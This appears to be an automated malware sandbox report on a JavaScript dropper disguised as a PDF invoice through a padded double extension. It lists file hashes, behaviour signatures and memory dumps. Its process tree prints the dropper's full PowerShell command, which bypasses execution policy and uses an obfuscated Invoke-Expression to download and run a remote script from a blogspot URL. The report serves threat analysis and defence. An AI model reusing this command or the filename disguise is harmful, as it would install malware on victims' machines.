Overview

overview

10

Static

static

1

lnvoice-17...� .js

windows7-x64

7

lnvoice-17...� .js

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 07:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    lnvoice-1712456537.pdf                        .js

  • Size

    80KB

  • MD5

    5eed57a36b459c29a10dbc8458493a26

  • SHA1

    4be4299dc346dc3499adb4b01edd09b339d858a4

  • SHA256

    cd4caace5e85b095654b499c34414a1d839ff30bf910993c3ebcdc1fbd9ff2bf

  • SHA512

    59192b7d17198bf257fe8de35ce9523f61a7eb8495647a784f6b386dfbf60642c5109bc37bccb580e71047d556a5ebf86e7943efe57d9f06c4435e57846732d2

  • SSDEEP

    768:rZQ0foU+Ui73GNNUZZQSYsVxU4Ua4UYdIMfVkArv6rAHcVxEBxVNoYdDBHBqabPg:oC1l2unjA06

Score
7/10
execution

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\lnvoice-1712456537.pdf                        .js
    1⤵
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:1776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://11-14hotelmain.blogspot.com///////chutmarao.pdf);Start-Sleep -Seconds 3;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2912

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2912-4-0x000007FEF5B4E000-0x000007FEF5B4F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2912-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2912-6-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2912-7-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2912-8-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2912-9-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2912-10-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2912-11-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2912-12-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

    Filesize

    9.6MB

    Download